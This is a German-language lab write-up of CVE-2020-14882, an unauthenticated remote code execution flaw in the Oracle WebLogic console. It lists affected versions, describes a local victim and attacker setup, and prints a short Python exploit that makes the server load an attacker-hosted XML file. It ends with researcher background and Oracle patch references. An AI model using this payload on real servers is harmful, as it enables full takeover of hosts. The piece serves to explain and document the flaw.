
Übernahme von Oracle WebLogic Server
CVE-2020-14882 ist eine Sicherheitslücke zur Remote-Codeausführung (RCE) in der Console-Komponente von Oracle WebLogic Server. Dieser Sicherheitslücke, die vor der Authentifizierung ausgenutzt werden kann, wurde eine geringe Angriffskomplexität („low“) zugeschrieben; Oracle hob sie als „leicht ausnutzbar“ hervor, was zu einem kritischen CVSSv3-Wert von 9,8 führte. Eine erfolgreiche Ausnutzung würde es einem nicht authentifizierten Angreifer ermöglichen, den Oracle-WebLogic-Server über HTTP zu kompromittieren und die vollständige Kontrolle über den Host zu übernehmen. (Weitere Informationen – Tenable)
Betroffen sind die unterstützten Versionen 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 und 14.1.1.0.0.
Opfer (WebLogic Server): 192.168.0.15 - Windows 10 PRO, auf dem WebLogic Server läuft.
Angreifer (gehostete XML-Datei): 192.168.0.16 - Kali Linux - GNU/Linux - Debian.
Payload:
import requests
url = http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
'?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
'(%22http://192.168.0.16:8000/Documents/teste.xml%22)'.format('192.168.0.15', '7001')
response = requests.get(url)
Dieser Payload ruft eine XML-Bibliothek des Spring-Frameworks auf, um eine Anfrage an einen Server in der Domäne des Angreifers zu senden, bei der nach der Datei teste.xml gesucht wird.
Am 28. Oktober veröffentlichte der Sicherheitsforscher Jang einen Blogbeitrag (auf Vietnamesisch) über CVE-2020-14882, der Teilinformationen enthielt, die für einen PoC verwendet werden konnten. Jang ist mit WebLogic-Schwachstellen nicht unerfahren; ihm werden die Entdeckung und Meldung von CVE-2020-2555 an Oracle zugeschrieben, das die Sicherheitslücke im Critical Patch Update (CPU) vom Januar 2020 behob. Im März bestätigte Jang, dass CVE-2020-2555 nicht vollständig behoben war. Der Bypass für CVE-2020-2555 wurde von einem anderen Forscher, Quynh Le vom VNPT Information Security Center (ISC), offengelegt. Sowohl Le als auch Jang wird die Meldung dieses Bypass zugeschrieben, der als CVE-2020-2883 identifiziert ist. (Weitere Informationen – Tenable)
Oracle WebLogic: CVE-2020-14882 : Critical Patch Update (Doc ID 2771503.1). (Oracle-Support)
Oracle Critical Patch Update Advisory - Oktober 2020. (Oracle-Support)
So mildern Sie die Auswirkungen von CVE-2020-14882 auf Weblogic. (Oracle-Support)
Sicherheitslücke im Produkt Oracle WebLogic Server von Oracle Fusion Middleware. (Mitre - CVE)